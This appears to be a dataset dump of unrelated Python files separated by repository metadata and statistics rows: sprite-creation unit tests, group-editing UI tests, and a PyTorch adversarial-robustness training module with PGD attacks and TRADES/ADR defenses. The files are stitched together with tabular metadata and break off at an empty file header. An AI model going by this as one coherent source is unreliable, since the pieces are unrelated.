            'aturtle.sprites.BitmapSprite': self.bitmap_sprite_mock,
            'aturtle.sprites.VectorSprite': self.vector_sprite_mock,
        }
        for target, replacement in mock_targets.items():
            self.exit_stack.enter_context(mock.patch(target, replacement))

    def tearDown(self):
        self.exit_stack.close()

    def test_create_with_canvas_target_works(self):
        canvas = object()
        self.bitmap_shape_mock.return_value = object()
        sprites.create_sprite(canvas, 'filename')
        # The shape was built from the filename and the sprite received the
        # canvas as its first positional argument.
        self.bitmap_shape_mock.assert_called_once_with(filename='filename')
        self.bitmap_sprite_mock.assert_called_once()
        self.assertIs(self.bitmap_sprite_mock.call_args.args[0], canvas)

    def test_create_with_window_target_works(self):
        canvas = object()
        window = mock.Mock()
        window.canvas = canvas
        self.bitmap_shape_mock.return_value = object()
        sprites.create_sprite(window, 'filename')
        # The sprite must receive the window's canvas, not the window itself.
        self.bitmap_shape_mock.assert_called_once_with(filename='filename')
        self.bitmap_sprite_mock.assert_called_once()
        self.assertIs(self.bitmap_sprite_mock.call_args.args[0], canvas)
class TestFullyPatchedNoArgs(unittest.TestCase):

    """
    With all shape/sprite classes patched, create_sprite selects the shape
    and sprite classes from the source type and forwards default keyword
    arguments when the caller overrides nothing.
    """

    # Keyword arguments create_sprite is expected to forward to the Sprite
    # class by default. Previously this 14-line literal was duplicated
    # verbatim in all four tests.
    _EXPECTED_SPRITE_KWARGS = dict(
        anchor=(0, 0),
        angle=0,
        speed=360,
        m_speed=None,
        r_speed=None,
        easing=None,
        m_easing=None,
        r_easing=None,
        m_callback=None,
        r_callback=None,
        fps=80,
        update=False,
    )

    def setUp(self):
        self.bitmap_shape_mock = mock.Mock()
        self.vector_shape_mock = mock.Mock()
        self.bitmap_sprite_mock = mock.Mock()
        self.vector_sprite_mock = mock.Mock()
        self.exit_stack = contextlib.ExitStack()
        patches = (
            mock.patch('aturtle.sprites._BitmapShape', self.bitmap_shape_mock),
            mock.patch('aturtle.sprites._VectorShape', self.vector_shape_mock),
            mock.patch('aturtle.sprites.BitmapSprite', self.bitmap_sprite_mock),
            mock.patch('aturtle.sprites.VectorSprite', self.vector_sprite_mock),
        )
        for patch in patches:
            self.exit_stack.enter_context(patch)

    def tearDown(self):
        self.exit_stack.close()

    def _check_sprite_created(self, sprite_mock, canvas, shape, sprite):
        # One sprite was created with the expected arguments and the result
        # is what calling the Sprite class produced.
        sprite_mock.assert_called_once_with(
            canvas, shape, **self._EXPECTED_SPRITE_KWARGS)
        self.assertIs(sprite, sprite_mock.return_value)

    def test_create_sprite_from_str(self):
        canvas = object()
        shape = object()
        self.bitmap_shape_mock.return_value = shape
        sprite = sprites.create_sprite(canvas, 'filename')
        # One shape was created with filename keyword argument.
        self.bitmap_shape_mock.assert_called_once_with(filename='filename')
        self._check_sprite_created(
            self.bitmap_sprite_mock, canvas, shape, sprite)

    def test_create_sprite_from_path(self):
        canvas = object()
        shape = object()
        self.bitmap_shape_mock.return_value = shape
        path = pathlib.Path()
        sprite = sprites.create_sprite(canvas, path)
        # One shape was created with filename keyword argument.
        self.bitmap_shape_mock.assert_called_once_with(filename=path)
        self._check_sprite_created(
            self.bitmap_sprite_mock, canvas, shape, sprite)

    def test_create_sprite_from_bytes(self):
        canvas = object()
        shape = object()
        self.bitmap_shape_mock.return_value = shape
        sprite = sprites.create_sprite(canvas, b'image-payload')
        # One shape was created with data keyword argument.
        self.bitmap_shape_mock.assert_called_once_with(data=b'image-payload')
        self._check_sprite_created(
            self.bitmap_sprite_mock, canvas, shape, sprite)

    def test_create_sprite_from_list(self):
        canvas = object()
        shape = object()
        self.vector_shape_mock.return_value = shape
        the_list = [1, 2, 3, 4]
        sprite = sprites.create_sprite(canvas, the_list)
        # One vector shape was created from the list.
        self.vector_shape_mock.assert_called_once_with(the_list)
        self._check_sprite_created(
            self.vector_sprite_mock, canvas, shape, sprite)
class TestFullyPatchedWithArgs(unittest.TestCase):

    """
    With all shape/sprite classes patched, create_sprite forwards caller
    overrides to the shape and sprite classes, keeping defaults for
    everything else.
    """

    # Keyword arguments the Sprite class is expected to receive in every
    # test of this class: anchor/angle overridden by the caller, remaining
    # values at their defaults. Previously duplicated verbatim in all tests.
    _EXPECTED_SPRITE_KWARGS = dict(
        anchor=(42, 24),
        angle=180,
        speed=360,
        m_speed=None,
        r_speed=None,
        easing=None,
        m_easing=None,
        r_easing=None,
        m_callback=None,
        r_callback=None,
        fps=80,
        update=False,
    )

    def setUp(self):
        self.bitmap_shape_mock = mock.Mock()
        self.vector_shape_mock = mock.Mock()
        self.bitmap_sprite_mock = mock.Mock()
        self.vector_sprite_mock = mock.Mock()
        self.exit_stack = contextlib.ExitStack()
        patches = (
            mock.patch('aturtle.sprites._BitmapShape', self.bitmap_shape_mock),
            mock.patch('aturtle.sprites._VectorShape', self.vector_shape_mock),
            mock.patch('aturtle.sprites.BitmapSprite', self.bitmap_sprite_mock),
            mock.patch('aturtle.sprites.VectorSprite', self.vector_sprite_mock),
        )
        for patch in patches:
            self.exit_stack.enter_context(patch)

    def tearDown(self):
        self.exit_stack.close()

    def _check_sprite_created(self, sprite_mock, canvas, shape, sprite):
        # One sprite was created with the expected arguments and the result
        # is what calling the Sprite class produced.
        sprite_mock.assert_called_once_with(
            canvas, shape, **self._EXPECTED_SPRITE_KWARGS)
        self.assertIs(sprite, sprite_mock.return_value)

    def test_create_sprite_from_str(self):
        canvas = object()
        shape = object()
        self.bitmap_shape_mock.return_value = shape
        sprite = sprites.create_sprite(
            canvas,
            'filename',
            anchor=(42, 24),
            angle=180,
            rotations=18,
            pre_rotate=False,
        )
        # One shape was created with filename, rotations, and pre_rotate args.
        self.bitmap_shape_mock.assert_called_once_with(
            filename='filename',
            rotations=18,
            pre_rotate=False,
        )
        self._check_sprite_created(
            self.bitmap_sprite_mock, canvas, shape, sprite)

    def test_create_sprite_from_path(self):
        canvas = object()
        shape = object()
        self.bitmap_shape_mock.return_value = shape
        path = pathlib.Path()
        sprite = sprites.create_sprite(
            canvas,
            path,
            anchor=(42, 24),
            angle=180,
            rotations=18,
            pre_rotate=False,
        )
        # One shape was created with filename, rotations, and pre_rotate args.
        self.bitmap_shape_mock.assert_called_once_with(
            filename=path,
            rotations=18,
            pre_rotate=False,
        )
        self._check_sprite_created(
            self.bitmap_sprite_mock, canvas, shape, sprite)

    def test_create_sprite_from_bytes(self):
        canvas = object()
        shape = object()
        self.bitmap_shape_mock.return_value = shape
        sprite = sprites.create_sprite(
            canvas,
            b'image-payload',
            anchor=(42, 24),
            angle=180,
            rotations=18,
            pre_rotate=False,
        )
        # One shape was created with data, rotations, and pre_rotate args.
        self.bitmap_shape_mock.assert_called_once_with(
            data=b'image-payload',
            rotations=18,
            pre_rotate=False,
        )
        self._check_sprite_created(
            self.bitmap_sprite_mock, canvas, shape, sprite)

    def test_create_sprite_from_list(self):
        canvas = object()
        shape = object()
        self.vector_shape_mock.return_value = shape
        the_list = [1, 2, 3, 4]
        sprite = sprites.create_sprite(
            canvas,
            the_list,
            anchor=(42, 24),
            angle=180,
            fill_color='fill-color',
            line_color='line-color',
            line_width='line-width',
            rotations=18,
            pre_rotate=True,
        )
        # One vector shape was created with the expected arguments.
        self.vector_shape_mock.assert_called_once_with(
            the_list,
            fill_color='fill-color',
            line_color='line-color',
            line_width='line-width',
            rotations=18,
            pre_rotate=True,
        )
        self._check_sprite_created(
            self.vector_sprite_mock, canvas, shape, sprite)
class TestPartiallyPatchedNoArgs(unittest.TestCase):

    """
    With only the sprite classes patched, real shape instances route
    create_sprite to the matching sprite class with default arguments.
    """

    # Default keyword arguments expected on sprite creation. Previously
    # duplicated verbatim in both tests.
    _EXPECTED_SPRITE_KWARGS = dict(
        anchor=(0, 0),
        angle=0,
        speed=360,
        m_speed=None,
        r_speed=None,
        easing=None,
        m_easing=None,
        r_easing=None,
        m_callback=None,
        r_callback=None,
        fps=80,
        update=False,
    )

    def setUp(self):
        self.bitmap_sprite_mock = mock.Mock()
        self.vector_sprite_mock = mock.Mock()
        self.exit_stack = contextlib.ExitStack()
        patches = (
            mock.patch('aturtle.sprites.BitmapSprite', self.bitmap_sprite_mock),
            mock.patch('aturtle.sprites.VectorSprite', self.vector_sprite_mock),
        )
        for patch in patches:
            self.exit_stack.enter_context(patch)

    def tearDown(self):
        self.exit_stack.close()

    def _check_sprite_created(self, sprite_mock, canvas, shape, sprite):
        # One sprite was created with the expected arguments and the result
        # is what calling the Sprite class produced.
        sprite_mock.assert_called_once_with(
            canvas, shape, **self._EXPECTED_SPRITE_KWARGS)
        self.assertIs(sprite, sprite_mock.return_value)

    def test_create_sprite_from_vector_shape(self):
        canvas = object()
        shape = vector.Shape([1, 2, 3, 4])
        sprite = sprites.create_sprite(canvas, shape)
        self._check_sprite_created(
            self.vector_sprite_mock, canvas, shape, sprite)

    def test_create_sprite_from_bitmap_shape(self):
        canvas = object()
        class TestBitmapShape(bitmap.Shape):
            # bypass bitmap.Shape.__init__ — presumably it needs real image
            # data, which is irrelevant to the dispatch under test
            def __init__(self):
                pass
        shape = TestBitmapShape()
        sprite = sprites.create_sprite(canvas, shape)
        self._check_sprite_created(
            self.bitmap_sprite_mock, canvas, shape, sprite)
class TestPartiallyPatchedWithArgs(unittest.TestCase):

    """
    With only the sprite classes patched, real shape instances route
    create_sprite to the matching sprite class, forwarding the caller's
    anchor/angle overrides.
    """

    # Keyword arguments expected on sprite creation: anchor/angle overridden
    # by the caller, remaining values at their defaults. Previously
    # duplicated verbatim in both tests.
    _EXPECTED_SPRITE_KWARGS = dict(
        anchor=(42, 24),
        angle=180,
        speed=360,
        m_speed=None,
        r_speed=None,
        easing=None,
        m_easing=None,
        r_easing=None,
        m_callback=None,
        r_callback=None,
        fps=80,
        update=False,
    )

    def setUp(self):
        self.bitmap_sprite_mock = mock.Mock()
        self.vector_sprite_mock = mock.Mock()
        self.exit_stack = contextlib.ExitStack()
        patches = (
            mock.patch('aturtle.sprites.BitmapSprite', self.bitmap_sprite_mock),
            mock.patch('aturtle.sprites.VectorSprite', self.vector_sprite_mock),
        )
        for patch in patches:
            self.exit_stack.enter_context(patch)

    def tearDown(self):
        self.exit_stack.close()

    def _check_sprite_created(self, sprite_mock, canvas, shape, sprite):
        # One sprite was created with the expected arguments and the result
        # is what calling the Sprite class produced.
        sprite_mock.assert_called_once_with(
            canvas, shape, **self._EXPECTED_SPRITE_KWARGS)
        self.assertIs(sprite, sprite_mock.return_value)

    def test_create_sprite_from_vector_shape(self):
        canvas = object()
        shape = vector.Shape([1, 2, 3, 4])
        sprite = sprites.create_sprite(
            canvas,
            shape,
            anchor=(42, 24),
            angle=180,
        )
        self._check_sprite_created(
            self.vector_sprite_mock, canvas, shape, sprite)

    def test_create_sprite_from_bitmap_shape(self):
        canvas = object()
        class TestBitmapShape(bitmap.Shape):
            # bypass bitmap.Shape.__init__ — presumably it needs real image
            # data, which is irrelevant to the dispatch under test
            def __init__(self):
                pass
        shape = TestBitmapShape()
        sprite = sprites.create_sprite(
            canvas,
            shape,
            anchor=(42, 24),
            angle=180,
        )
        self._check_sprite_created(
            self.bitmap_sprite_mock, canvas, shape, sprite)
class TestNonPatched(unittest.TestCase):

    """
    Without any patching, create_sprite must reject unsupported shape
    source types with a TypeError.
    """

    def test_create_sprite_with_unsupported_type_raises_TypeError(self):
        canvas = object()
        unsupported_sources = (
            bool(),
            int(),
            float(),
            tuple(),
            dict(),
            range(42),
            (i for i in 'a-generator-object'),
        )
        for source in unsupported_sources:
            with self.subTest(bad_shape_source=source):
                with self.assertRaises(TypeError):
                    sprites.create_sprite(canvas, source)
| 27.40991
| 80
| 0.572227
| 2,001
| 18,255
| 4.977511
| 0.070465
| 0.052209
| 0.048193
| 0.060241
| 0.932731
| 0.923494
| 0.923494
| 0.923494
| 0.92008
| 0.915562
| 0
| 0.016282
| 0.333826
| 18,255
| 665
| 81
| 27.451128
| 0.80273
| 0.122816
| 0
| 0.844639
| 0
| 0
| 0.040205
| 0.028056
| 0
| 0
| 0
| 0
| 0.085339
| 1
| 0.059081
| false
| 0.004376
| 0.013129
| 0
| 0.089716
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6fa2372dd80da91db80b4b19c17c2c66e55230b7
| 1,910
|
py
|
Python
|
test/group_tests/test_edit_group.py
|
katghe/main
|
1d3b9e666a84c49d335d46eb62f27bf04aca519a
|
[
"Apache-2.0"
] | 3
|
2020-04-21T10:58:42.000Z
|
2021-05-31T17:14:02.000Z
|
test/group_tests/test_edit_group.py
|
katghe/main
|
1d3b9e666a84c49d335d46eb62f27bf04aca519a
|
[
"Apache-2.0"
] | null | null | null |
test/group_tests/test_edit_group.py
|
katghe/main
|
1d3b9e666a84c49d335d46eb62f27bf04aca519a
|
[
"Apache-2.0"
] | null | null | null |
from model.group import Group
import random
def test_edit_group_name(app, db, check_ui):
    """Edit a random group's name; the DB list (and UI list, when checked)
    must stay consistent apart from the edited field."""
    if not db.get_group_list():
        app.group.create(Group(name="sdfsdf"))
    old_groups = db.get_group_list()
    target = random.choice(old_groups)
    app.group.edit_group_by_id(target.id, Group(name="Group21"))
    assert len(old_groups) == app.group.count()
    new_groups = db.get_group_list()
    assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
    if check_ui:
        assert sorted(new_groups, key=Group.id_or_max) == sorted(
            app.group.get_group_list(), key=Group.id_or_max)
def test_edit_group_header(app, db, check_ui):
    """Edit a random group's header; the DB list (and UI list, when checked)
    must stay consistent apart from the edited field."""
    if not db.get_group_list():
        app.group.create(Group(header="sdfsdf"))
    old_groups = db.get_group_list()
    target = random.choice(old_groups)
    app.group.edit_group_by_id(target.id, Group(header="header21"))
    assert len(old_groups) == app.group.count()
    new_groups = db.get_group_list()
    assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
    if check_ui:
        assert sorted(new_groups, key=Group.id_or_max) == sorted(
            app.group.get_group_list(), key=Group.id_or_max)
def test_edit_group_footer(app, db, check_ui):
    """Edit a random group's footer; the DB list (and UI list, when checked)
    must stay consistent apart from the edited field."""
    if not db.get_group_list():
        app.group.create(Group(footer="sdfsdf"))
    old_groups = db.get_group_list()
    target = random.choice(old_groups)
    app.group.edit_group_by_id(target.id, Group(footer="footer21"))
    assert len(old_groups) == app.group.count()
    new_groups = db.get_group_list()
    assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
    if check_ui:
        assert sorted(new_groups, key=Group.id_or_max) == sorted(
            app.group.get_group_list(), key=Group.id_or_max)
| 41.521739
| 113
| 0.71623
| 316
| 1,910
| 3.996835
| 0.120253
| 0.083135
| 0.114014
| 0.114014
| 0.901821
| 0.901821
| 0.901821
| 0.901821
| 0.901821
| 0.901821
| 0
| 0.005562
| 0.15288
| 1,910
| 45
| 114
| 42.444444
| 0.775031
| 0
| 0
| 0.710526
| 0
| 0
| 0.021466
| 0
| 0
| 0
| 0
| 0
| 0.236842
| 1
| 0.078947
| false
| 0
| 0.052632
| 0
| 0.131579
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6fae228b8f3ad47814aa7fe198d54e0967acca04
| 11,487
|
py
|
Python
|
ADR_pt/mytrain.py
|
tuananhbui89/Adversarial-Divergence-Reduction
|
7304fa514b6c044aa19afce87c3794f9619e9665
|
[
"Apache-1.1"
] | 13
|
2020-12-17T11:44:41.000Z
|
2021-08-20T02:22:02.000Z
|
ADR_pt/mytrain.py
|
tuananhbui89/Adversarial-Divergence-Reduction
|
7304fa514b6c044aa19afce87c3794f9619e9665
|
[
"Apache-1.1"
] | null | null | null |
ADR_pt/mytrain.py
|
tuananhbui89/Adversarial-Divergence-Reduction
|
7304fa514b6c044aa19afce87c3794f9619e9665
|
[
"Apache-1.1"
] | 1
|
2020-12-17T11:45:39.000Z
|
2020-12-17T11:45:39.000Z
|
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader, TensorDataset
from torch.autograd import Variable
import torch.optim as optim
from functools import partial
from trades import trades_loss
from pgd import pgd_loss, pgd_attack, pgd_attack_l2
from adr import adr_pgd, adr_trades
from utils import count_pred
def get_diff(X, X_adv, order, epsilon=None):
    """Mean per-sample p-norm distance between a clean batch X and its
    adversarial counterpart X_adv (both flattened per sample).

    When epsilon is given, additionally returns the mean fraction of
    per-sample coordinates whose absolute perturbation exceeds epsilon,
    as the tuple (mean_dist, frac_exceed); otherwise returns mean_dist only.
    """
    flat_clean = X.reshape(X.shape[0], -1)
    flat_adv = X_adv.reshape(X_adv.shape[0], -1)
    per_sample = torch.norm(
        flat_adv - flat_clean, p=order, dim=-1, keepdim=True)  # [b, 1]
    mean_dist = torch.mean(per_sample)  # scalar
    if epsilon is None:
        return mean_dist
    exceeded = torch.abs(flat_adv - flat_clean) > epsilon
    frac_exceed = torch.mean(
        torch.sum(exceeded, dim=1) / flat_clean.shape[1])
    return mean_dist, frac_exceed
def train(model, data_loader, epoch, optimizer, device, log_interval, attack_params, writer):
    """Standard (non-adversarial) training for one epoch.

    Parameters
    ----------
    model : torch.nn.Module to train (set to train mode here)
    data_loader : torch.utils.data.DataLoader yielding (data, target)
    epoch : int, current epoch index (used for the global logging step)
    optimizer : torch optimizer
    device : torch device the batches are moved to
    log_interval : int, log every log_interval batches
    attack_params : dict, unused here; kept for a uniform interface with the
        adversarial trainers (baseline_train / adr_train)
    writer : summary writer with an add_scalar(tag, value, step) method

    Returns
    -------
    writer : the same writer, after logging
    """
    model.train()
    # Derive the batch count from the loader's actual batch size instead of
    # a hard-coded 128; fall back to 128 when the loader does not expose one
    # (matches the previous behavior for the default configuration).
    batch_size = getattr(data_loader, 'batch_size', None) or 128
    num_batches = len(data_loader.dataset) // batch_size
    for batch_idx, (data, target) in enumerate(data_loader):
        data, target = data.to(device), target.to(device)
        optimizer.zero_grad()
        output = model(data)
        # per-sample CE averaged afterwards (same value as reduction='mean')
        loss = F.cross_entropy(output, target, reduction='none')
        loss = torch.mean(loss)
        loss.backward()
        optimizer.step()
        nat_acc = get_acc(output, target)
        if batch_idx % log_interval == 0:
            writestr = [
                ('Train_iter={}', epoch*num_batches + batch_idx),
                ('loss={:.4f}', loss.item()),
                ('nat_acc={:.4f}', nat_acc.item()),
            ]
            writestr = ' ,'.join([t.format(v) for (t, v) in writestr])
            print(writestr)
            writer.add_scalar('loss', loss.item(), epoch*num_batches + batch_idx)
            writer.add_scalar('nat_acc', nat_acc.item(), epoch*num_batches + batch_idx)
    return writer
def baseline_train(model, data_loader, epoch, optimizer, device, log_interval, attack_params, writer):
    """One epoch of baseline adversarial training (PGD-AT or TRADES).

    The defense is selected by attack_params['defense'] ('pgd_train' or
    'trades_train'); the remaining attack_params entries parameterize the
    inner attack. Logs natural/adversarial accuracy and the loss every
    log_interval batches and returns the writer.

    Raises
    ------
    ValueError if attack_params['defense'] names an unknown defense.
    """
    model.train()
    if attack_params['defense'] == 'pgd_train':
        defense = pgd_loss
    elif attack_params['defense'] == 'trades_train':
        defense = trades_loss
    else:
        # was a bare 'raise ValueError' with no message
        raise ValueError(
            'unknown defense: {}'.format(attack_params['defense']))
    # Derive the batch count from the loader's actual batch size instead of
    # a hard-coded 128; fall back to 128 when the loader does not expose one.
    batch_size = getattr(data_loader, 'batch_size', None) or 128
    num_batches = len(data_loader.dataset) // batch_size
    for batch_idx, (data, target) in enumerate(data_loader):
        data, target = data.to(device), target.to(device)
        optimizer.zero_grad()
        loss, X_adv = defense(model=model,
                              x_natural=data,
                              y=target,
                              device=device,
                              optimizer=optimizer,
                              step_size=attack_params['step_size'],
                              epsilon=attack_params['epsilon'],
                              perturb_steps=attack_params['num_steps'],
                              beta=attack_params['trades_beta'],
                              projecting=attack_params['projecting'],
                              x_min=attack_params['x_min'],
                              x_max=attack_params['x_max'])
        loss.backward()
        optimizer.step()
        nat_output = model(data)
        adv_output = model(X_adv)
        nat_acc = get_acc(nat_output, target)
        adv_acc = get_acc(adv_output, target)
        if batch_idx % log_interval == 0:
            writestr = [
                ('Train_iter={}', epoch*num_batches + batch_idx),
                ('nat_acc={:.4f}', nat_acc.item()),
                ('adv_acc={:.4f}', adv_acc.item()),
                ('loss={:.4f}', loss.item()),
            ]
            writestr = ' ,'.join([t.format(v) for (t, v) in writestr])
            print(writestr)
            writer.add_scalar('nat_acc', nat_acc.item(), epoch*num_batches + batch_idx)
            writer.add_scalar('adv_acc', adv_acc.item(), epoch*num_batches + batch_idx)
            writer.add_scalar('loss', loss.item(), epoch*num_batches + batch_idx)
    return writer
def adr_train(model, data_loader, epoch, optimizer, device, log_interval, attack_params, writer):
    """Train *model* for one epoch with an ADR defense objective.

    attack_params['defense'] selects the objective: 'adr_pgd' -> adr_pgd,
    'adr_trades' -> adr_trades; any other value raises ValueError.  Same
    logging behavior as baseline_train.  Returns the (mutated) *writer*.
    """
    model.train()
    if attack_params['defense'] == 'adr_pgd':
        defense = adr_pgd
    elif attack_params['defense'] == 'adr_trades':
        defense = adr_trades
    else:
        raise ValueError('unknown defense: {}'.format(attack_params['defense']))
    # Use the loader's actual batch size for the global-step index instead of
    # the hard-coded 128 (wrong step numbers for any other batch size).
    batch_size = getattr(data_loader, 'batch_size', None) or 128
    num_batches = len(data_loader.dataset) // batch_size
    for batch_idx, (data, target) in enumerate(data_loader):
        data, target = data.to(device), target.to(device)
        optimizer.zero_grad()
        loss, X_adv = defense(model=model,
                              x_natural=data,
                              y=target,
                              device=device,
                              optimizer=optimizer,
                              step_size=attack_params['step_size'],
                              epsilon=attack_params['epsilon'],
                              perturb_steps=attack_params['num_steps'],
                              beta=attack_params['trades_beta'],
                              projecting=attack_params['projecting'],
                              x_min=attack_params['x_min'],
                              x_max=attack_params['x_max'],
                              lccomw=attack_params['lccomw'],
                              lcsmtw=attack_params['lcsmtw'],
                              gbcomw=attack_params['gbcomw'],
                              gbsmtw=attack_params['gbsmtw'],
                              confw=attack_params['confw'])
        loss.backward()
        optimizer.step()
        if batch_idx % log_interval == 0:
            # Accuracies are for logging only: compute lazily, under no_grad
            # (the original ran these extra forward passes every batch, which
            # also updates BatchNorm running stats in train mode).
            with torch.no_grad():
                nat_acc = get_acc(model(data), target)
                adv_acc = get_acc(model(X_adv), target)
            step = epoch * num_batches + batch_idx
            writestr = [
                ('Train_iter={}', step),
                ('nat_acc={:.4f}', nat_acc.item()),
                ('adv_acc={:.4f}', adv_acc.item()),
                ('loss={:.4f}', loss.item()),
            ]
            print(' ,'.join([t.format(v) for (t, v) in writestr]))
            writer.add_scalar('nat_acc', nat_acc.item(), step)
            writer.add_scalar('adv_acc', adv_acc.item(), step)
            writer.add_scalar('loss', loss.item(), step)
    return writer
def test(model, data_loader, device, return_count=False, num_classes=10):
    """Evaluate *model* on clean data.

    Prints average cross-entropy loss, overall accuracy, and per-class
    prediction counts.  Returns accuracy, or
    (accuracy, pred_as_count, correct_count, class_count) when
    return_count is True.
    """
    model.eval()
    total = len(data_loader.dataset)
    test_loss = 0
    correct = 0
    pred_as_count = np.zeros(shape=[num_classes,])
    correct_count = np.zeros(shape=[num_classes,])
    class_count = np.zeros(shape=[num_classes,])
    with torch.no_grad():
        for data, target in data_loader:
            data = data.to(device)
            target = target.to(device)
            output = model(data)
            # accumulate the summed (not averaged) batch loss
            test_loss += F.cross_entropy(output, target, reduction='sum').item()
            # index of the max log-probability per sample
            pred = output.argmax(dim=1, keepdim=True)
            correct += pred.eq(target.view_as(pred)).sum().item()
            p, c = count_pred(labels=target, preds=output, num_classes=num_classes)
            pred_as_count += p
            correct_count += c
            # counting the labels against themselves yields per-class totals
            class_count += count_pred(labels=target, preds=target, num_classes=num_classes)[0]
    test_loss /= total
    accuracy = correct / total
    print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
        test_loss, correct, total,
        100. * correct / total))
    print('pred_as_count: ', pred_as_count)
    print('correct_count: ', correct_count)
    if return_count:
        return accuracy, pred_as_count, correct_count, class_count
    return accuracy
def adv_test(model, data_loader, device, attack_params, return_count=False, num_classes=10):
    """Evaluate robustness of *model* under a PGD attack.

    Same outputs as test(): returns accuracy, or
    (accuracy, pred_as_count, correct_count, class_count) when
    return_count is True.
    """
    model.eval()
    test_loss = 0
    correct = 0
    pred_as_count = np.zeros(shape=[num_classes,])
    correct_count = np.zeros(shape=[num_classes,])
    class_count = np.zeros(shape=[num_classes,])
    # NOTE(review): the attack runs inside torch.no_grad(); this only works
    # if pgd_attack re-enables gradients internally (torch.enable_grad()) --
    # confirm, otherwise the adversarial examples degenerate to the input.
    with torch.no_grad():
        for data, target in data_loader:
            data, target = data.to(device), target.to(device)
            X_adv, _ = pgd_attack(model, data, target, device, attack_params, status='eval')
            # detach() replaces the deprecated
            # Variable(X_adv.data, requires_grad=False) idiom.
            X_adv = X_adv.detach()
            output = model(X_adv)
            test_loss += F.cross_entropy(output, target, reduction='sum').item()  # sum up batch loss
            pred = output.argmax(dim=1, keepdim=True)  # get the index of the max log-probability
            correct += pred.eq(target.view_as(pred)).sum().item()
            p, c = count_pred(labels=target, preds=output, num_classes=num_classes)
            pred_as_count += p
            correct_count += c
            class_count += count_pred(labels=target, preds=target, num_classes=num_classes)[0]
    test_loss /= len(data_loader.dataset)
    accuracy = correct / len(data_loader.dataset)
    print('\nRobustness evaluation : Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
        test_loss, correct, len(data_loader.dataset),
        100. * correct / len(data_loader.dataset)))
    if return_count:
        return accuracy, pred_as_count, correct_count, class_count
    else:
        return accuracy
def adv_test_l2(model, data_loader, device, attack_params, return_count=False, num_classes=10):
    """Evaluate robustness of *model* under an L2 PGD attack.

    Same outputs as adv_test(): returns accuracy, or
    (accuracy, pred_as_count, correct_count, class_count) when
    return_count is True.
    """
    model.eval()
    test_loss = 0
    correct = 0
    pred_as_count = np.zeros(shape=[num_classes,])
    correct_count = np.zeros(shape=[num_classes,])
    class_count = np.zeros(shape=[num_classes,])
    # NOTE(review): as in adv_test, the attack runs inside torch.no_grad();
    # pgd_attack_l2 must re-enable gradients internally -- confirm.
    with torch.no_grad():
        for data, target in data_loader:
            data, target = data.to(device), target.to(device)
            X_adv, _ = pgd_attack_l2(model, data, target, device, attack_params, status='eval')
            # detach() replaces the deprecated
            # Variable(X_adv.data, requires_grad=False) idiom.
            X_adv = X_adv.detach()
            output = model(X_adv)
            test_loss += F.cross_entropy(output, target, reduction='sum').item()  # sum up batch loss
            pred = output.argmax(dim=1, keepdim=True)  # get the index of the max log-probability
            correct += pred.eq(target.view_as(pred)).sum().item()
            # Fix: pass num_classes through (the original omitted it here,
            # unlike adv_test, silently breaking for num_classes != 10).
            p, c = count_pred(labels=target, preds=output, num_classes=num_classes)
            pred_as_count += p
            correct_count += c
            class_count += count_pred(labels=target, preds=target, num_classes=num_classes)[0]
    test_loss /= len(data_loader.dataset)
    accuracy = correct / len(data_loader.dataset)
    print('\nRobustness evaluation : Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
        test_loss, correct, len(data_loader.dataset),
        100. * correct / len(data_loader.dataset)))
    if return_count:
        return accuracy, pred_as_count, correct_count, class_count
    else:
        return accuracy
def get_pred(model, data_loader, device):
    """Return softmax class probabilities for every batch in *data_loader*.

    *data_loader* yields unlabeled input batches.  Returns a single
    numpy array of shape (num_samples, num_classes).
    """
    model.eval()
    result = []
    with torch.no_grad():
        for data in data_loader:
            data = data.to(device)
            output = model(data)
            # Softmax over the class dimension.  The original instantiated
            # torch.nn.Softmax() with no dim per batch, which is deprecated
            # and ambiguous; dim=1 makes the class axis explicit.
            probs = F.softmax(output, dim=1)
            result.append(probs.cpu().numpy())
    return np.concatenate(result, axis=0)
def get_acc(output, target):
    """Mean accuracy: fraction of rows in *output* whose argmax equals *target*."""
    predictions = output.argmax(dim=1, keepdim=True)
    matches = predictions.eq(target.view_as(predictions))
    return matches.type(torch.FloatTensor).mean()
| 38.676768
| 103
| 0.586663
| 1,419
| 11,487
| 4.524313
| 0.110641
| 0.056075
| 0.030374
| 0.046729
| 0.817601
| 0.803427
| 0.788006
| 0.777259
| 0.777259
| 0.774922
| 0
| 0.00798
| 0.290938
| 11,487
| 296
| 104
| 38.807432
| 0.780233
| 0.016279
| 0
| 0.721992
| 0
| 0
| 0.059079
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037344
| false
| 0
| 0.049793
| 0
| 0.141079
| 0.033195
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6fb5f84ba9d0fb43bdb320c5a8b2fe7670f7120d
| 195,239
|
py
|
Python
|
toontown/battle/ParticleDefs.py
|
LittleNed/toontown-stride
|
1252a8f9a8816c1810106006d09c8bdfe6ad1e57
|
[
"Apache-2.0"
] | 1
|
2018-06-16T23:06:38.000Z
|
2018-06-16T23:06:38.000Z
|
toontown/battle/ParticleDefs.py
|
